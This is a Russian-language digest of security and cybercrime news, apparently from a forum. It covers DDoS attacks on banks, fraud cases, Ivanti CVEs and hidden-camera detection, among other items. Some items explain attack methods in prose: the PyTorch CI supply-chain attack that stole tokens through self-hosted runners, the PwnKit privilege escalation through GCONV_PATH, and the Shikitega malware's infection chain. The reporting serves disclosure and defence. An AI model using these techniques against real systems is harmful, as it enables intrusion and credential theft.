Особенность наблюдаемых атак заключается в том, что это атаки уровня
приложения (Application Layer, L7), трафик которых может максимально походить
на активность обычных пользователей. В таких нападениях используется
шифрованный HTTPS трафик, для очистки которого требуется большое количество
ресурсов и вычислительных мощностей, поскольку к обработке незашифрованных
запросов добавляется криптографическая нагрузка.
Отмечается, что у российского финансового рынка «есть определенная специфика в
области информационной безопасности, что осложняет фильтрацию подобного рода
атак». То есть банк не имеет права раскрывать третьим лицам финансовую тайну,
поэтому его трафик не может быть дешифрован без риска отзыва лицензии.
Соответственно предоставлять ключи шифрования своему поставщику услуг защиты
от DDoS-атак банки не имеют права – это идет вразрез с политиками
безопасности. Именно по этой причине атаки Mēris, затронувшие банковскую
индустрию, оказались сложны в выявлении и нейтрализации.
«Обычно мы наблюдаем не более 90 значимых DDoS-инцидентов в неделю, а на 11 сентября их пришлось более 300, – рассказывает основатель и генеральный директор Qrator Labs Александр Лямин. — Mēris не сдает своих позиций: атаки с его использованием продолжаются и носят феноменальный характер. В минувшие выходные в фокусе внимания злоумышленников был банковский сектор, но это не значит, что атаки не коснутся и других отраслей экономики. С учетом высокого бизнес-сезона, начавшегося в России, компаниям любого размера стоит озаботиться вопросами защиты заранее, и если система противодействия распределенным атакам на отказ в обслуживании способна в автоматическом режиме обрабатывать весь трафик HTTPS без раскрытия ключей шифрования, это поможет достойно выдержать любые атаки без сбоев в работе сервисов».
Click to expand...
Сенат Австралии одобрил расширение полномочий местных силовых органов в сфере информационных технологий. Теперь Федеральная полиция Австралии (AFP) и Комиссия по уголовной разведке (ACIC) могут без решения суда взламывать доступ к устройствам, учетным записям и получать данные подозреваемых в тяжелых преступлениях.
Под действие закона подпадает любое правонарушение, предусматривающее лишение свободы на срок от 3 лет. Это касается даже использования пиратских программ.
Что позволяет закон полицейским:
собирать информацию о криминальных сетях, действующих в общедоступном
интернете и даркнете
пресекать преступную деятельность через добавление, удаление, изменение или
копирование данных подозреваемых
получать контроль над устройствами и учётными записями подозреваемых для сбора
информации
Разрешения на эти операции будет выдавать Административный апелляционный трибунал Австралии — агентство Генеральной прокуратуры страны.
Сотрудники частных компаний, занимающихся безопасностью в интернете, обязаны помогать полиции во взломе устройств или учетных записей подозреваемых. Если они откажут в содействии, им грозит до 10 лет лишения свободы.
В суде Центрального района г. Минска рассмотрено дело в отношении компании «Киномакс», которая занималась на территории страны интернет-пиратством. Суд подверг компанию штрафу в 120 базовых величин (3 480 рублей), сообщили корреспонденту агентства «Минск-Новости» участники процесса.
Известно, что ООО «Киномакс» предоставляло абонентам МТС-Беларусь услугу по доступу к онлайн-сервису Kinomax с множеством телеканалов, а также к фильмам и сериалам онлайн-сервиса «Амедиатека». При этом прав на использование ряда телеканалов у компании не было. Одна из компаний-правообладателей зафиксировала факт несанкционированного использования телеканала, записав фрагмент телепередачи на видео, и обратилась с претензиями в суд.
Суд установил, что имело место административное нарушение, предусмотренное ч. 2 ст. 10.15 КоАП Республики Беларусь, и назначил нарушителю штраф. При этом, как известно из данных, предоставленных Министерством юстиции Беларуси, соучредитель и директор на момент совершения правонарушения компании «Киномакс» Дмитрий Крехно до судебного заседания запустил процесс ликвидации общества, но при этом ранее зарегистрировал другую компанию — ООО «КиноХата», перезаключив официальный договор с российской компанией «А Сериал» — правообладателем онлайн-кинотеатра «Амедиатека» с ООО «Киномакс» на ООО «КиноХата».
Ранее еще одной компании — ООО «Медиатек», аффилированной с компанией «КиноХата», — Министерством информации Беларуси выносилось предупреждение в связи с тем, что платформа по доступу к телеканалам tvbox.by, организованная указанной компанией, транслирует телеканалы, которые не прошли соответствующую регистрацию в Беларуси. При этом ООО «Медиатек» имеет официальный договор с компанией ООО «Старт.Ру» — правообладателем онлайн-кинотеатра «START.ru» — с целью интеграции ее для платформы «TV+» с доступом к ней абонентов мобильного оператора Life (Беларусь).
Инспекция почтового обслуживания США (USPIS), правоохранительное подразделение Почтовой службы США (USPS), планирует улучшить методы ведения расследований, связанных с криптовалютами.
USPIS расследует преступления, взаимодействуя с другими правоохранительными органами, в том числе с Федеральным бюро расследований США (ФБР) и Сетью по борьбе с финансовыми преступлениями (FinCEN), чтобы выявить преступников, использующих почтовые сервисы для совершения незаконных действий. Эксперт по кибербезопасности и технологиям Мэри Ллойд (Mary Lloyd) провела внутренний аудит рабочих процессов USPIS, и выявила множество недостатков в работе ведомства с криптовалютами
[Согласно отчету USPIS](https://www.oversight.gov/sites/default/files/oig- reports/USPS/21-067-R21.pdf), в целом ведомство эффективно регистрирует конфискованные криптоактивы, однако есть смысл улучшить многие процедуры расследования. Ллойд считает, что для почтовых инспекторов необходимо запустить стандартизированные обучающие семинары, посвященные криптовалютам. USPIS заявила, что для проведения секретных операций почтовые инспекторы должны проходить тщательный отбор. Однако ведомство не располагает информацией, какие курсы по криптовалютам должны проходить сотрудники USPIS.
Из-за отсутствия стандартизированного обучения, лишь два из девяти сотрудников ведомства готовы изучать криптовалюты в процессе работы. Некомпетентность в области криптовалют мешает сотрудникам USPIS эффективно проводить расследования. Так, в 2019 и 2020 годах криптовалютный фонд Cryptocurrency Fund Program, созданный в 2017 году в качестве кастодиана для цифровых активов USPIS, получил девять запросов на проведение следственных действий с криптовалютами, а почтовым инспекторам удалось конфисковать цифровые активы лишь в четырех случаях
Ллойд пояснила, что без комплексной программы обучения и четкого руководства по работе с площадками даркнета сотрудников USPIS можно легко «рассекретить». В программном обеспечении, используемом USPIS для отслеживания криптовалютных транзакций, тоже были обнаружены проблемы. Речь идет о дублировании информации о транзакциях, что может привести к нарушению целостности данных и неточностям.
Поэтому Ллойд призвала USPIS разработать программу обучения криптовалютам для инспекторов, продумать руководство по управлению кошельком, который используется службой для покупки и хранения криптовалют, а также внести исправления в систему бухучета и улучшить взаимодействие между почтовыми инспекторами и криптовалютным фондом.
[Генпрокуратура России](https://lenta.ru/tags/organizations/genprokuratura- rf/) признала нежелательной организацию Recorded Future (США). Об этом «Ленте.ру» рассказали в ведомстве.
В Генеральной прокуратуре заявили, что организация причастна к кибератакам на Россию. Штаб-квартира Recorded Future находится в штате Массачусетс, а филиалы работают в Великобритании, Швеции, Японии и Сингапуре.
Сотрудники ораганизации предоставляют услуги по поиску, обработке и аналитике данных, в том числе в закрытом сегменте интернета. Они специализируются на киберугрозах, активно взаимодействуют с ЦРУ и разведслужбами других государств.
Ранее Генпрокуратура России [признала нежелательной](https://lenta.ru/news/2024/12/04/zaregistrirovannuyu-v-ssha- organizatsiyu-hram-satany-priznali-nezhelatelnoy-v-rossii/) зарегистрированную в США организацию «Храм сатаны» (The Satanic Temple). Организация дискредитирует традиционные духовно-нравственные ценности.
Источник: [https://lenta.ru/news/2024/12/18/am...corded-future-priznali- nezhelatelnoy-v-rossii](https://lenta.ru/news/2024/12/18/amerikanskuyu- organizatsiyu-recorded-future-priznali-nezhelatelnoy-v-rossii)
Что ни решениеIvanti, то ниже 9 по CVSS не обходится.
На этот раз в очередной серииIvanti bugs - 27 уязвимостей в продуктеAvalanche MDM, конечно же, включая две критические ошибки на борту, приводящие к выполнению команд.
CVE-2024-24996 и CVE-2024-29204 описываются как проблемы переполнения кучи в компонентахWLInfoRailService и WLAvalancheService в MDM-решении.
Обе, как отмечаетIvanti в [своем бюллетене](https://forums.ivanti.com/s/article/Avalanche-6-4-3-Security- Hardening-and-CVEs- addressed?language=en_US)[,](https://forums.ivanti.com/s/article/Avalanche-6-4-3-Security- Hardening-and-CVEs-addressed?language=en_US) могут быть использованы удаленно, без аутентификации, и имеют оценку CVSS 9,8.
ПредставленныеIvanti исправления вAvalanche также устраняют многочисленные уязвимости высокой степени серьезности, которые могут позволить удаленным злоумышленникам, не прошедшим проверку подлинности, выполнять команды с системными привилегиями.
Восемь из них описаны как проблемы обхода пути в веб-компоненте**Ivanti
Avalanche.
**
Ошибка неограниченной загрузки файлов и две уязвимости состояния гонки
(TOCTOU) в веб-компоненте также могут быть использованы для выполнения команд
в качестве System.
Еще одна серьезная ошибка переполнения кучи в компонентеWLInfoRailService может быть использована удаленно и без аутентификации для выполнения команд.
Другая не менее серьезная проблема использования после освобождения вWLAvalancheService приводит к удаленному выполнению кода.
Выпущенные обновления также устраняют несколько ошибок высокой степени серьезности, связанных с DoS, и проблемы средней серьезности, позволяющих удаленным злоумышленникам, не прошедшим проверку подлинности, извлекать конфиденциальную информацию из памяти.
Недостаткам подвержены все поддерживаемые версии решенияMDM(версии 6.3.1 и выше), включая и более старые версии. 6.4.3Avalanche содержит исправления.
По даннымIvanti, ни одна из устраненных уязвимостей не использовалась в реальных условиях.
Но верить на слово поставщику со столь «безупречной» репутацией не стоит, такой флеш-рояль явно уже в руках опытных акторов, которые ранее уже эксплуатировали недостатки, для которых были выпущены патчи.
В «громком» деле «Гринстар майнинга» поставлена точка. Октябрьский районный суд г. Иркутска вынес обвинительный приговор пяти жителям Челябинской области, которые в 2021 году в составе организованной группы путем обмана похитили имущество – денежные средства и майнинговое оборудование 68 потерпевших, причинив последним ущерб в особо крупном размере на общую сумму свыше 12 млн. рублей.
Мошенники под видом легальной деятельности фирмы «Гринстар майнинг», основной офис которой располагался в арендованном ими для этих целей помещении на ул. Байкальской в г. Иркутске, разместили в сети Интернет рекламу о продаже майнингового оборудования по договорам поставки с условием 50-процентной его предоплаты, а также о возможном размещении уже имеющегося у клиентов майнингового оборудования в так называемом «хостеле» фирмы за денежные средства. Солидный офис, сотрудники в униформе, визитки, папки с логотипом компании и бейсболки клиентам в подарок – в совокупности своей не вызывали у клиентов подозрений в благонадежности компании, а цены на оборудование, ниже рыночных, радовали глаз и обеспечивали приток немалого количества желающих приобрести себе майнинговую машинку. По итогу же «сотрудничества» с «Гринстар майнинг» клиенты не получали ни оборудования, ни переданных мошенникам за него денежных средств.
Приговором Октябрьского районного суда г. Иркутска 11 апреля 2024 года подсудимым назначено наказание в виде лишения свободы сроками от 3 лет 8 месяцев до 4 лет с отбыванием наказания в исправительной колонии общего режима. Разрешена судьба гражданских исков потерпевших.
Приговор в законную силу не вступил.
[Раскрыты](https://johnstawinski.com/2024/01/11/playing-with-fire-how-we- executed-a-critical-supply-chain-attack-on-pytorch/) детали атаки на инфраструктуру, используемую при разработке фреймворка машинного обучения PyTorch, позволившую извлечь ключи доступа, достаточные для размещения произвольных данных в репозитории с релизами проекта в GitHub и AWS, а также для подстановки кода в основную ветку репозитория и добавления бэкдора через зависимости. Подмена релизов PyTorch могла использоваться для осуществления атаки на крупные компании, такие как Google, Meta, Boeing и Lockheed Martin, использующие PyTorch в своих проектах. В рамках программы Bug Bounty компания Meta выплатила исследователям $16250 за информацию о проблеме.
Суть атаки в возможности выполнения своего кода на серверах непрерывной интеграции, выполняющих пересборку и выполнение заданий для тестирования новых изменений, отправляемых в репозиторий. Проблема затрагивает проекты, которые используют собственные внешние обработчики "Self-Hosted Runner" с GitHub Actions. В отличие от традиционных GitHub Actions обработчики Self-Hosted выполняются не в инфраструктуре GitHub, а на своих серверах или в виртуальных машинах, поддерживаемых разработчиками.
Выполнение сборочных заданий на своих серверах позволяет организовать запуск кода, который может осуществить сканирование внутренней сети предприятия, поиск в локальной ФС ключей шифрования и токенов доступа, анализ переменных окружения с параметрами обращения к внешним хранилищам или облачным сервисам. При отсутствии должной изоляции сборочного окружения найденные конфиденциальные данные могут быть отправлены атакующим вовне, например, через обращение к внешним API. Для определения использования проектами "Self-Hosted Runner" может использоваться инструментарий Gato, анализирующий общедоступные workflow-файлы и логи запуска CI-заданий.
В PyTorch и многих других проектах, использующих "Self-Hosted Runner", запуск сборочных заданий разрешён только разработчикам, изменения которых ранее проходили рецензирование и включались в кодовую базу проекта. Наличие статуса "contributor" при использовании в репозитории настроек по умолчанию даёт возможность запускать обработчики GitHub Actions при передаче pull-запросов и, соответственно, выполнять свой код в любом окружении GitHub Actions Runner, привязанном к репозиторию или курирующей проект организации.
Привязку к статусу "contributor" оказалось легко обойти - достаточно предварительно отправить незначительное изменение и дождаться его принятия в кодовую базу, после чего разработчик автоматически получал статус активного участника, pull-запросы которого разрешено тестировать в CI-инфраструктуре без отдельной проверки. Для получения статуса активного разработчика в ходе эксперимента использовались незначительные косметические изменения, связанные с устранением опечаток в документации. Для получения доступа к репозиторию и хранилищу релизов PyTorch в ходе атаки при выполнении кода в "Self-Hosted Runner" был осуществлён перехват токена GitHub, применявшегося для доступа к репозиторию из сборочных процессов, а также ключей AWS, задействованных для сохранения результатов сборки.
Проблема не специфична для PyTorch и [затрагивает](https://johnstawinski.com/2024/01/05/worse-than-solarwinds- three-steps-to-hack-blockchains-github-and-ml-through-github-actions/) многие другие крупные проекты, которые используют настройки по умолчанию для "Self- Hosted Runner" в GitHub Actions. Например, упомянуто осуществление похожих атак для подстановки бэкдора в некоторые крупные кошельки криптовалют и блокчейн-проекты с миллиардной капитализацией, внесения изменений в релизы Microsoft Deepspeed и проекта TensorFlow, компрометации приложения компании CloudFlare, а также выполнения кода на одном из компьютеров в сети Microsoft. Детали по данным инцидентам пока не раскрываются. В рамках действующих программ Bug Bounty исследователи отправили более 20 заявок для получения вознаграждений на сумму несколько сотен тысяч долларов.
В Ярославле произошла история, словно из фильма о юных воришках: 16-летний подросток, видимо, решил испытать свои навыки скрытности и украл у своей знакомой ювелирку на сумму 3 500 000₽!
С каждым приглашением в гости, блестяшки из комода телепортировались в ломбард.
Теперь его приняли, ждём на Лолзе тему "Одолжил у тянки драги на 3,5кк, что
мне за это будет??"
По материалам, собранным полицейскими, сотрудниками СУ СК России по
Ярославской области возбуждено уголовное дело по п. «б» ч. 4 ст. 158 УК РФ
«Кража, совершенная в особо крупном размере».
В Самаре 55-летняя сотрудница строительной компании лишилась 3,5 млн рублей после сообщения в мессенджере. Женщине написал мошенник, который представился сотрудником правоохранительных органов. Он сказал, что деньги надо срочно перевести на "безопасный счет ", сообщает пресс-служба ГУ МВД России по Самарской области.
- Собеседник сообщил женщине, что ему поступили секретные данные: на ее имя мошенники пытаются оформить кредит, и для того, чтобы их разоблачить и предотвратить потерю сбережений, нужно срочно все деньги со счетов перечислить на безопасный счет. Поверив, жительница региона последовала инструкции и перевела почти 3,5 миллиона рублей на указанный счет, - рассказали в облМВД.
После этого «сотрудник правоохранительных органов» перестал выходить на связь, а обманутая женщина пошла в полицию, где возбудили уголовное дело.
В МВД напоминают, что сотрудники правоохранительных органов не пишут и не буду писать гражданам в мессенджерах.
Специалисты AT&T обнаружили нового, очень скрытного Linux-зловреда, позволяющего через эксплойт повысить привилегии и захватить контроль над конечным или IoT-устройством. В настоящее время Shikitega нацелен на установку майнера монеро, однако его можно с легкостью приспособить для доставки и более опасного пейлоада.
Каким образом вредонос попадает в системы, пока не установлено. Анализ кода выявил многоступенчатую цепочку заражения (по несколько сотен байт за шаг) и другие результаты усилий авторов Shikitega, стремившихся уберечь свое детище от обнаружения.
Так, для обхода антивирусов в нем используется схема кодирования полезной нагрузки Shikata Ga Nai. Эта техника из арсенала Metasploit обеспечивает полиморфизм, позволяя защитить код от статического анализа на основе сигнатур.
Заражение начинается с небольшого, весом 370 байт, ELF-файла — дроппера с шелл-кодом, контрольная сумма которого постоянно меняется. Используя кодировщик, зловред слой за слоем расшифровывает полезную нагрузку; составной итог запускается на исполнение, в ходе которого устанавливается связь с C2-сервером.
При подключении тот отдает дополнительный шелл-код, который сохраняется и запускается в памяти зараженного устройства. Одна из этих команд загружает и активирует Mettle — облегченный вариант бэкдора Meterpreter, позволяющий расширить возможности удаленного контроля и выполнения кода.
Этот модуль, в свою очередь, загружает другой крохотный ELF-файл, который обеспечивает эксплойт CVE-2021-4034 (кодовое имя PwnKit) и CVE-2021-3493 для повышения привилегий и доставки финальной полезной нагрузки — XMRig 6.17.0. Чтобы обеспечить криптомайнеру постоянное присутствие, в систему загружаются шелл-скрипты, добавляющие задания cron: два для текущего пользователя, два для root. В результате все загруженные файлы стираются, что тоже снижает риск обнаружения вредоносной программы.
Командная инфраструктура Shikitega размещена на легитимном облачном хостинге. Это стоит дороже и облегчает идентификацию авторов атак, если те попадут в поле зрения правоохраны, но помогает скрыть факты взлома и заражения.
• Source: <https://cybersecurity.att.com/blogs/labs-research/shikitega-new- stealthy-malware-targeting-linux>
Комиссия по торговле товарными фьючерсами и Министерство юстиции США предъявили обвинения четырем подозреваемым в создании криптовалютной пирамиды JetCoin и обмане инвесторов на общую сумму $44 млн.
Комиссия по торговле товарными фьючерсами (CFTC) обвинила трех граждан США: Дуэйна Голдена (Dwayne Golden), Грегори Аггесена (Gregory Aggesen) и Маркиза Эгертона (Marquis Egerton), а также гражданина Индии Джатина Пателя (Jatin Patel) в мошенничестве и вымогательстве. Ведомство утверждает, что они организовали криптовалютные схемы под названиями Empowercoin и Ecoinplus, с помощью которых им удалось «выманить» у инвесторов более $23 млн в биткоинах. Кроме того, совместно с Пателем они создали криптовалютную аферу JetCoin, в ходе которой собрали $21 млн.
Создатели этих схем утверждали, что они работали с профессионалами, имеющими большой опыт в торговле биткоином, поэтому инвесторам гарантировалась прибыль в размере 200% за 90 дней. Выяснилось, что аферисты присвоили $9.8 млн из бюджета Ecoinplus и Empowercoin, и $7.8 млн – из JetCoin. Часть денег они использовали для выплат инвесторам, стоящим «на верхушке» пирамиды, а большую часть средств потратили на личные нужды.
Министерство юстиции США также опубликовало обвинение против Голдена, Аггесена и Эгертона по 11 пунктам. Ведомство обвинило их в сговоре для совершения мошенничества с использованием электронных средств связи, отмывании денег и фальсификации информации. Ведомство утверждает, что с июня 2017 года обвиняемые пытались помешать расследованию Федеральной торговой комиссии США (FTC), уничтожив улики и предоставив правоохранительным органам ложную информацию. Этими действиями обвиняемые препятствовали правосудию, утверждает Минюст.
Напомним, что в 2020 году FTC выразила готовность возместить убытки инвесторов, ставших жертвами криптовалютных мошенников. Однако в конце прошлого года генеральный директор Управления по финансовому регулированию и надзору Великобритании (FCA) Нихил Рати (Nikhil Rathi) заявил, что правительства не должны компенсировать потери пользователей, проявивших неосторожность при инвестициях.
• Source: cftc.gov/PressRoom/PressReleases/8498-22
• Source: justice[.]gov/usao-edny/pr/owners-and-operators-online- cryptocurrency-companies-indicted-defrauding-investors
Криптовалютная биржа Binance предупредила пользователей, что проведет проверку и заморозку аккаунтов, владельцы которых использовали чужие личные данные для прохождения процедуры KYC.
Представители площадки [подчеркнули](https://www.binancezh.top/zh- CN/support/announcement/1388ac454a0d4c939507b9679338d00b), что использование чужих данных для верификации аккаунта недопустимо, и команда по контролю рисков Binance в ближайшее время запустит масштабную работу по выявлению таких аккаунтов.
«Мы обнаружили, что некоторые пользователи прошли верификацию с помощью купленной идентификационной информации. После выявления таких аккаунтов они будут заморожены. Мы советуем не покупать чужие идентификационные данные по различным каналам во избежание потери средств», – говорится в уведомлении.
Пока неизвестно, когда именно начнутся проверки и заморозки аккаунтов. Также неясно, сможет ли владелец аккаунта пройти верификацию с реальными данными и вернуть доступ к своим средствам.
Напомним, что Binance ввела обязательную идентификацию пользователей в прошлом году. Как впоследствии рассказал генеральный директор площадки Чанпэн Чжао (Changpeng Zhao), биржа потеряла примерно 3% пользователей, которые не захотели проходить процедуры KYC.
Компания Qualys [выявила](https://blog.qualys.com/vulnerabilities-threat- research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability- discovered-in-polkits-pkexec-cve-2021-4034) уявзвимость (CVE-2021-4034) в системном компоненте Polkit (бывший PolicyKit), используемом в дистрибутивах для организации выполнения непривилегированными пользователями действий, требующих повышенных прав доступа. Уязвимость позволяет непривилегированному локальному пользователю повысить свои привилегии до пользователя root и получить полный контроль над системой. Проблема получила кодовое имя PwnKit и примечательна подготовкой рабочего эксплоита, работающего в конфигурации по умолчанию в большинстве дистрибутивов Linux.
Проблема присутствует во входящей в состав PolKit утилите pkexec, поставляемой с флагом SUID root и предназначенной для запуска команд с привилегиями другого пользователя в соответствии с заданными правилами PolKit. Из-за некорректной обработки передаваемых в pkexec аргументов командной строки непривилегированный пользователь мог обойти аутентификацию и добиться запуска своего кода с правами root, независимо от установленных правил доступа. Для атаки неважно какие настройки и ограничения в PolKit заданы, достаточно чтобы для исполняемого файла с утилитой pkexec был выставлен признак SUID root.
Pkexec не проверяет корректность счётчика аргументов командной строки (argc), передаваемых при запуске процесса. Разработчиками pkexec подразумевалось, что первая запись массива argv всегда содержит имя процесса (pkexec), а вторая либо значение NULL, либо имя запускаемой через pkexec команды. Так как счётчик аргументов не проверялся на соответствие фактическому содержимому массива и полагалось, что он всегда больше 1, в случае передачи процессу пустого массива argv, что допускает функция execve в Linux, pkexec воспринимал значение NULL как первый аргумент (имя процесса), а следующую за пределами буфера память, как далее идущее содержимое массива.
Проблема в том, что следом за массивом argv в памяти размещается массив envp, содержащий переменные окружения. Таким образом, при пустом массиве argv, pkexec извлекает данные о запускаемой с повышенными привилегиями команде из первого элемента массива с переменными окружения (argv[1] становился идентичен envp[0]), содержимое которого может контролировать атакующий.
Получив значение argv[1], pkexec пытается с учётом файловых путей в PATH определить полный путь к исполняемому файлу и записать указатель на строку с полным путём обратно в argv[1], что приводит к перезаписи и значения первой переменной окружения, так как argv[1] идентичен envp[0]. Через манипуляцию с именем первой переменной окружения, атакующий может осуществить подстановку другой переменной окружения в pkexec, например, подставить переменную окружения "LD_PRELOAD", которая не допускается в suid-программах, и организовать загрузку в процесс своей разделяемой библиотеки.
В рабочем эксплоите осуществляется подстановка переменной GCONV_PATH, которая используется для определения пути к библиотеке перекодирования символов, динамически загружаемой при вызове функции g_printerr(), в коде которой используется iconv_open(). Переопределив путь в GCONV_PATH атакующий может добиться загрузки не штатной библиотеки iconv, а своей библиотеки, обработчики из которой будут выполнены во время вывода сообщения об ошибке на стадии, когда pkexec ещё выполняется с правами root и до проверки полномочий запуска.
Отмечается, что несмотря на то, что проблема вызвана повреждением памяти, она может надёжно и повторяемо эксплуатироваться независимо от используемой аппаратной архитектуры. Подготовленный эксплоит успешно протестирован в Ubuntu, Debian, Fedora и CentOS, но может быть использован и в других дистрибутивах. Оригинальный эксплоит пока не доступен публично, что свидетельствует о том, что он является тривиальным и может быть легко воссоздан другими исследователями, поэтому на многопользовательских системах важно как можно скорее установить обновление с исправлением. Polkit также доступен для BSD-систем и Solaris, но изучение возможности эксплуатации в них не производилось. Известно только то, что атака не может быть осуществлена в OpenBSD, так как ядро OpenBSD не допускает передачу при вызове execve() нулевого значения argc.
Проблема присутствует с мая 2009 года, со времени добавления команды pkexec. Исправление уявзимости в PolKit пока доступно в виде патча (корректирующий выпуск не сформирован), но так как разработчики дистрибутивов были заранее уведомлены о проблеме, большинство дистрибутивов опубликовало обновление одновременно с раскрытием информации об уязвимости. Проблема устранена в RHEL 6/7/8, Debian, Ubuntu, openSUSE, SUSE, Fedora, ALT Linux, ROSA, Gentoo, Void Linux, Arch Linux и Manjaro. В качестве временной меры для блокирования уязвимости можно убрать флаг SUID root с программы /usr/bin/pkexec ("chmod 0755 /usr/bin/pkexec").
• Video: https://vimeo.com/669715589?embedded=true&source=video_title&owner=42884007
Протокол DeFi Visor Finance на основе Uniswap подвергся взлому, в ходе которого хакерам удалось украсть 8.8 млн токенов VISR на сумму около $8.2 млн. Курс токена рухнул в 30 раз.
Команда Visor Finance сообщила в Твиттере об эксплойте, обнаруженном в контракте VISR для стейкинга. Злоумышленники применили атаку повторного входа для удвоения количества токенов VISR, а также воспользовались уязвимостью, позволяющей без ограничений выпускать эти токены.
Хакеры продали все украденные криптоактивы на децентрализованной бирже Uniswap. Кроме того, они использовали миксер Tornado Cash в попытке смешать транзакции, чтобы скрыть свою личность. Атака и распродажа хакерами серьезно отразились на курсе VISR, который обрушился с $0.92 до $0.03.
Специалисты Visor Finance сообщили, что никакие позиции или гипервизоры не подверглись риску из-за взлома, а убытки пострадавших пользователей, занимавшихся стейкингом VISR, будут возмещены. Позднее стало известно, что Visor Finance проведет миграцию токенов, основываясь на состоянии протокола до проведения атаки. Торговые сделки после эксплойта VISR не повлияют на погашаемую сумму, заявило руководство проекта.
Visor Finance подвергается серьезному взлому уже не в первый раз. В июне у проекта были украдены токены на сумму $500 млн.
Исследователи из Национального университета Сингапура и Университета Ёнсе (Корея) разработали метод выявления в помещении скрытых камер при помощи обычного смартфона, оснащённого датчиком ToF (Time of flight). Отмечается, что в настоящее время скрытую камеру можно купить по цене чуть больше доллара и такие камеры имеют размер 1-2 миллиметра, что существенно затрудняет их поиск в помещениях. В Южной Корее за год зафиксировано более 6800 инцидентов, связанных с размещением скрытых камер в гостиничных номерах или ванных комнатах.
Предложенный исследователями метод LAPD (Laser-Assisted Photography Detection) позволяет выявлять скрытые камеры при помощи современных смартфонов, оснащённых датчиком глубины (ToF), применяемым для оценки расстояния до предметов при фокусировке камеры и в приложениях дополненной реальности. В качестве примеров смартфонов, в которых используются подобные датчики, называются Samsung S20 и Huawei P30 Pro. Датчик выстраивает карту глубины, выполняя сканирование окружающего пространства лазером и вычисляя расстояние на основании задержки прихода отражённого луча.
Метод выявления скрытых камер основан на выявлении аномалий при подсветке лазером объективов и линз, которые создают специфичные блики на результирующей карте глубины. Аномалии выявляются при помощи алгоритма машинного обучения, умеющего отличать специфичные для камер блики. Авторы исследования намерены опубликовать готовое приложений для платформы Android после решения некоторых проблем с ограничениями API.
Общее время, необходимое для сканирования комнаты, оценивается в 30-60 секунд. В проведённом с 379 добровольцам эксперименте скрытые камеры при помощи метода LAPD были обнаружены в 88.9% случаях. Для сравнения, на глаз камеры смогли найти лишь 46% участников эксперимента, а эффективность использования специализированного детектора сигнала K18 составила 62.3% и 57.7% в зависимости от выбранного режима сканирования. Метод LAPD также показал более низкий уровень ложных срабатываний - 16.67% против 26.9%/35.2% для K18 и 54.9% при поиске на глаз.
Точность обнаружения LAPD зависит от попадания скрытой камеры в 20-градусный угол обзора датчика и нахождении от датчика на оптимальном расстоянии (при слишком близком расположении блик от камеры смазывается, а при слишком отдалённом - пропадает). Для повышения точности предлагается использовать датчики с более высоким разрешением (в имеющихся у исследователей смартфонах разрешение ToF-датчика составляет 320x240, т.е. размер аномалии на изображении всего 1-2 пикселя) и детализацией глубины (сейчас для каждого пикселя имеется лишь 8 уровней глубины).
Из других методов оценки наличия скрытой камеры отмечаются анализаторы беспроводного трафика, определяющие наличие потоковой передачи видео по беспроводной сети, а также сканеры электромагнитного излучения.
Несовершеннолетний житель областного центра осужден за торговлю реквизитами банковских карт и кражу денег со счета. Об этом сообщили БЕЛТА в пресс-службе Гродненского областного суда.
Несовершеннолетний гродненец 2006 года рождения с ноября 2022 года по апрель 2023-го распространил третьим лицам свои анкетные и контактные данные, реквизиты паспорта, банковских платежных карт, эмитированных ЗАО "Альфа-Банк" и ОАО "БНБ-Банк" и аутентификационные данные. Таким образом он обеспечил возможность дистанционного доступа и обслуживания названных карт-счетов, подтверждающих авторизацию операций от имени обвиняемого. Для этого он использовал мобильный телефон и получил вознаграждение в общей сумме не менее Br100.
В отделении одного из банков обвиняемый 10 апреля 2023 года с открытого на его имя банковского счета, доступ к которому ранее был им передан неустановленному лицу, тайно похитил добытые от противоправной деятельности денежные средства неустановленного лица в сумме более Br8 тыс. Деньгами он распорядился по своему усмотрению.
На судебном заседании обвиняемый виновным в предъявленном обвинении себя признал полностью.
Суд Ленинского района признал гродненца виновным в краже, совершении из корыстных побуждений незаконного распространения аутентификационных данных, посредством которых возможно получение доступа к счетам. На основании ч.1 ст.205 УК он приговорен к аресту на срок 1 месяц. На основании ч.1 ст.222 УК ему назначено наказание в виде ограничения свободы без направления в исправительное учреждение открытого типа на срок 2 года. По совокупности преступлений обвиняемому окончательно назначено наказание в виде ограничения свободы без направления в исправительное учреждение открытого типа на срок 2 года. Судом также применена специальная конфискация мобильного телефона, принадлежащего обвиняемому.
Оперативники по противодействию киберпреступности Центрального РУВД столицы за
незаконный оборот средств платежа задержали 19-летнего минчанина. Парень в
мессенджере нашел подработку. Незнакомец в переписке предложил фигуранту
оформить банковскую карту и передать ее с реквизитами за Br100. В течение трех
месяцев задержанный в банке оформил на свое имя три банковские карты, которые
с реквизитами передал за деньги незнакомцу.
Следователи возбудили уголовное дело за незаконный оборот средств платежа.
Фигуранту грозит до шести лет лишения свободы.
Обнародована информация о пяти уязвимостях в библиотеках libX11 и libXpm, развиваемых проектом X.Org. Проблемы устранены в выпусках libXpm 3.5.17 и libX11 1.8.7. Три уязвимости выявлены в библиотеке libX11, предлагающей функции с клиентской реализацией протокола X11:
• [CVE-2023-43785](https://security- tracker.debian.org/tracker/CVE-2023-43789CVE-2023-43785) - выход за границы буфера в коде libX11, проявляющийся при обработке ответа от X-сервера с числом символов, не соответствующих ранее отправленному запросу XkbGetMap. Уязвимость вызвана ошибкой в X11R6.1, существующей с 1996 года. Уязвимость может быть эксплуатирована при подключении приложения, использующего libX11, к вредоносному X-серверу или промежуточному прокси, контролируемому злоумышленником.
• CVE-2023-43786 - исчерпание стека в результате бесконечной рекурсии в функции PutSubImage() в libX11, возникающей при обработке специально оформленных данных в формате XPM. Уязвимость существует с момента выхода X11R2 в феврале 1988 года.
• CVE-2023-43787 - целочисленное переполнение в функции XCreateImage() в libX11, приводящее к переполнению кучи из-за ошибки в вычислении размера, не соответствующего фактическому размеру данных. Проблемная функция XCreateImage() вызывается из функции XpmReadFileToPixmap(), что позволяет эксплуатировать уязвимость при обработке специально оформленного файла в формате XPM. Уязвимость также существует со времён X11R2 (1988 год).
Кроме того, раскрыты две уязвимости в библиотеке libXpm (CVE-2023-43788 и [CVE-2023-43789](https://security- tracker.debian.org/tracker/CVE-2023-43789)), вызванные возможностью чтения из областей вне границ выделенной памяти. Проблемы проявляются при загрузке комментария из буфера в памяти и обработке XPM-файла с некорректной картой цветов. Обе уязвимости датируются 1998 годом и были найдены благодаря применению инструментов для выявления ошибок работы с памятью и fuzzing- тестирования AddressSanitizer и libFuzzer.
